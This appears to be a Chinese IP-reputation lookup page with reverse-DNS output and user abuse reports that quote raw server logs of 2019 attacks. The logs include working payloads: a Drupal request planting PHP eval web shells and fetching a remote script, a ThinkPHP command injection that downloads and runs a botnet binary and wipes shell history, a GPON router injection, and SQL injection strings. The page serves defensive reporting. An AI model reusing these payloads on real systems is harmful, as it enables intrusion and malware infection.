城市(city): unknown
省份(region): unknown
国家(country): None
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 117.13.171.203 | attackspam | The IP has triggered Cloudflare WAF. CF-Ray: 54124d307f2fed13 | WAF_Rule_ID: 1112825 | WAF_Kind: firewall | CF_Action: challenge | Country: CN | CF_IPClass: noRecord | Protocol: HTTP/1.1 | Method: GET | Host: blog.skk.moe | User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Mobile Safari/537.36 | CF_DC: SJC. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/SukkaW/Cloudflare-WAF-to-AbuseIPDB). |
2019-12-08 05:19:30 |
| 117.13.171.68 | attackbotsspam | probing for wordpress favicon backdoor GET /home/favicon.ico |
2019-07-10 04:02:57 |
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 117.13.171.99
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3085
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;117.13.171.99. IN A
;; AUTHORITY SECTION:
. 573 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022022001 1800 900 604800 86400
;; Query time: 136 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Feb 21 12:10:01 CST 2022
;; MSG SIZE rcvd: 106
99.171.13.117.in-addr.arpa domain name pointer dns99.online.tj.cn.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
99.171.13.117.in-addr.arpa name = dns99.online.tj.cn.
Authoritative answers can be found from:
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 119.203.225.156 | attack | 119.203.225.156 - - [11/Apr/2019:11:38:59 +0800] "GET /check-ip/148.70.11.98 HTTP/1.1" 200 8744 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 119.203.225.156 - - [11/Apr/2019:11:39:00 +0800] "GET /?q=node/add HTTP/1.1" 200 3267 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 119.203.225.156 - - [11/Apr/2019:11:39:00 +0800] "GET /?q=user HTTP/1.1" 200 3267 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" |
2019-04-11 11:39:57 |
| 46.119.126.51 | spam | 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://jav-fetish.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://gidonline.one/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://gidonline.one/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://jav-fetish.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:50 +0800] "GET / HTTP/1.1" 301 228 "https://gidonline.one/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:50 +0800] "GET / HTTP/1.1" 301 228 "https://jav-fetish.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" |
2019-04-03 16:42:55 |
| 207.46.13.239 | bots | 微软爬虫 207.46.13.239 - - [08/Apr/2019:08:24:31 +0800] "GET /check-ip/140.143.208.180 HTTP/1.1" 200 8658 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 207.46.13.239 - - [08/Apr/2019:08:24:31 +0800] "GET /check-ip/46.176.7.175 HTTP/1.1" 200 7632 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 207.46.13.239 - - [08/Apr/2019:08:24:31 +0800] "GET /check-ip/69.12.66.213 HTTP/1.1" 200 7890 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" |
2019-04-08 08:28:58 |
| 101.235.171.58 | attack | 101.235.171.58 - - [07/Apr/2019:12:05:51 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 301 194 "-" "Hello, World" 101.235.171.58 - - [07/Apr/2019:12:05:51 +0800] "mp/gpon80;sh+/tmp/gpon80+gpon80'&ipv=0" 400 182 "-" "-" 101.235.171.58 - - [07/Apr/2019:12:05:51 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 301 194 "-" "Hello, World" 101.235.171.58 - - [07/Apr/2019:12:05:51 +0800] "mp/gpon80;sh+/tmp/gpon80+gpon80'&ipv=0" 400 182 "-" "-" |
2019-04-07 12:07:50 |
| 101.227.151.57 | attack | 101.227.151.57 - - [06/Apr/2019:18:57:27 +0800] "GET /pk1914.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.227.151.57 - - [06/Apr/2019:18:57:27 +0800] "GET /pk1914.php HTTP/1.1" 404 209 "http://118.25.52.138/pk1914.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 19:00:44 |
| 192.99.15.141 | attack | 192.99.15.141 - - [10/Apr/2019:21:48:58 +0800] "GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1" 200 29740 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" |
2019-04-11 06:38:05 |
| 58.251.121.185 | attack | 58.251.121.185 - - [06/Apr/2019:14:36:24 +0800] "GET /avast.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.184 - - [06/Apr/2019:14:36:25 +0800] "GET /myadmin2/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.185 - - [06/Apr/2019:14:36:25 +0800] "GET /avast.php HTTP/1.1" 404 209 "http://118.25.52.138/avast.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.184 - - [06/Apr/2019:14:36:25 +0800] "GET /myadmin2/index.php HTTP/1.1" 404 209 "http://118.25.52.138/myadmin2/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 14:38:07 |
| 186.82.70.55 | attack | sql注入攻击 186.82.70.55 - - [10/Apr/2019:06:30:16 +0800] "GET /check-ip/14.34.148.34/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(107,110,113,83,79,106,98,102,109,100,116,99),1),name_const (CHAR(107,110,113,83,79,106,98,102,109,100,116,99),1))a)%20--%20%27x%27=%27x HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" 186.82.70.55 - - [10/Apr/2019:06:30:19 +0800] "GET /iplist/2%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,104,114,106,112,73,65,102,81,80,111),1),name_const(CHAR(85,104,114,106,1 12,73,65,102,81,80,111),1))a)%20--%20and%201%3D1 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" 186.82.70.55 - - [10/Apr/2019:06:30:19 +0800] "GET /%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,111,78,69,104,81,99,85,73),1),name_const(CHAR(85,111,78,69,104,81,99,85,73),1))a )%20--%20and%201%3D1 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" |
2019-04-10 07:14:16 |
| 195.231.6.16 | attack | 端口扫描,攻击IP |
2019-04-09 14:39:18 |
| 118.25.145.186 | attack | 118.25.145.186 - - [10/Apr/2019:12:27:07 +0800] "{\\x22id\\x22:1,\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22method\\x22:\\x22login\\x22,\\x22params\\x22:{\\x22login\\x22:\\x22x\\x22,\\x22pass\\x22:\\x22x\\x22,\\x22agent\\x22:\\x22x\\x22}}" 400 182 "-" "-" |
2019-04-10 12:27:32 |
| 71.6.167.142 | bots | 71.6.167.142 - - [08/Apr/2019:20:08:35 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 71.6.167.142 - - [08/Apr/2019:20:08:35 +0800] "GET /robots.txt HTTP/1.1" 301 194 "-" "-" 71.6.167.142 - - [08/Apr/2019:20:08:36 +0800] "GET /sitemap.xml HTTP/1.1" 301 194 "-" "-" 71.6.167.142 - - [08/Apr/2019:20:08:36 +0800] "GET /.well-known/security.txt HTTP/1.1" 301 194 "-" "-" |
2019-04-08 20:17:40 |
| 60.215.24.152 | attack | 伪装爬虫攻击 60.215.24.152 - - [09/Apr/2019:05:27:08 +0800] "POST ///zhanpushi.asp HTTP/1.1" 404 571 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:09 +0800] "POST ///data/shitan.php HTTP/1.1" 404 573 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:09 +0800] "POST ///e/news.php HTTP/1.1" 404 568 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:09 +0800] "POST ///plus/e7xue.php HTTP/1.1" 404 572 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:10 +0800] "POST ///aurrs.jsp HTTP/1.1" 404 567 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" 60.215.24.152 - - [09/Apr/2019:05:27:10 +0800] "POST ///eback/bdata/u113791a_20110421200120/config.php HTTP/1.1" 404 604 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" |
2019-04-09 07:21:00 |
| 61.219.11.153 | botsattack | 61.219.11.153 - - [07/Apr/2019:13:04:34 +0800] "\\x01\\x02\\x03\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" 400 182 "-" "-" |
2019-04-07 13:08:17 |
| 121.84.221.236 | attack | 121.84.221.236 - - [08/Apr/2019:19:53:14 +0800] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.131/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' HTTP/1.1" 400 182 "-" "Akari(selfrep)" |
2019-04-08 19:54:18 |
| 207.180.211.248 | attack | 207.180.211.248 - - [10/Apr/2019:15:58:13 +0800] "GET /t6nv.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" 207.180.211.248 - - [10/Apr/2019:15:58:14 +0800] "GET /muhstik.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" 207.180.211.248 - - [10/Apr/2019:15:58:14 +0800] "GET /text.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" 207.180.211.248 - - [10/Apr/2019:15:58:14 +0800] "GET /wp-config.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" 207.180.211.248 - - [10/Apr/2019:15:58:14 +0800] "GET /muhstik.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" 207.180.211.248 - - [10/Apr/2019:15:58:15 +0800] "GET /muhstik2.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" 207.180.211.248 - - [10/Apr/2019:15:58:15 +0800] "GET /muhstiks.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" 207.180.211.248 - - [10/Apr/2019:15:58:15 +0800] "GET /muhstik-dpr.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" 207.180.211.248 - - [10/Apr/2019:15:58:15 +0800] "GET /lol.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" |
2019-04-10 16:01:17 |